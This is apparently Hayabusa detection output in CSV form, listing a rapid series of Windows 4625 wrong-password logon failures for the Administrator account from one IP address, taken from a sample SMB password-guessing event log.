2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: teUZYpNyqJ64Dgcz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9kaKSy3DV5fRKvTc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtiZUzpwrnuWIjna  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SD9UhsShNJRp251r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C5xbL7aO0azgBxfz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xqrUpW8PpI9RAeGk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M80K04eYwfwdzIul  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jcWY7cNeCNgJ3Czr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1OA561UrTkFnbEj3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iDnu1G7jmwLoXGLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e2v70poTOKPUNZJo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhzoOmgTrdvTS27z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pyvmBFGhKFgvzM9S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHC0keHW2YsKeP02  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 29vkwuFa6njYc86s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s9687XPVHFiwttdm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AcNGaeTqTydGinJE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWRu7ZC1eo1nn0IQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M52CihyrQk9MOfCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xBKSOZwS6f9ofXu7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uT1LHJs7kyeMmTtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7FvZhetkdjnZOSpq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0DDC7WfL5T4d01yT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1dUzuddZH3Stespw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LKpORcDX0ccf1xMq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u4RbbKttCYPld8RR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: joni643cVcuBZH9K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bqY6TkW782CWKtvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d8c1I63ULh17l0rN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cjOtMpWutC9qeSss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gmsFnerFYwXXe4Wt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rzIZ4vC0E2CYq5mc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0uZe50jJH0aj9xZi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LZM5UuxLymuAMJcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iF1dq6UfuqpFpGkf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NQVTj9OLayvEg8dg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 98F9mULm7DsRUN49  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h6KjEOAdknvIMwOA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UHUu0OKm8fsHTnum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esdoSyg6HkaSiJ0z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M4lnVe7qNVEspxFV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Phei86bKte1UCbMi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ehA1LQ2Rs0Wts9JW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WcXtnkpww8HlSBb3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y8U7FrQZgDvQ09Uq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UgWwCtz3Gnoq9zYd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mRNPwCogYrwSGeZf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6O9rWY8UGCbuhSwZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HuH4avUJ4AwqXTGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: japOFEaHgyT3T2fO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXpRMMNJRgjmd4km  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtTXA6BiiVyv42cj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wfYkwvNOfKj7rlTj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QzAZyceDjfmUOdz6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C0Qais0cF8avXJQ6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7KBM2fIEK6pEl7F2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N3stckaysFk58QAF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oVK4S15DDLWISQ7i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fAA1bFLD5YMohS9q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k5V3sfIsj4kYtaGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJw4MBG0cvIz2fMR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AXJ0UBfKCzLXJ5y0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z3A2mmYGcjHBbX3M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oGlR6pBLnDrzMsqu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gv7nWzZ1HN9mgTya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dnPUb3w2d7Ltif2E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GCWXdvBeDPpeKhWJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GN3OXSzQqLDF348i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AAWiBhYPNQ0RUuOX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V5CBG3hblqr8kvWw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MDBaKpfYttm4H1gj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PNszt6piEznMlTdF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iqmBPOQIG6M1rZjX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
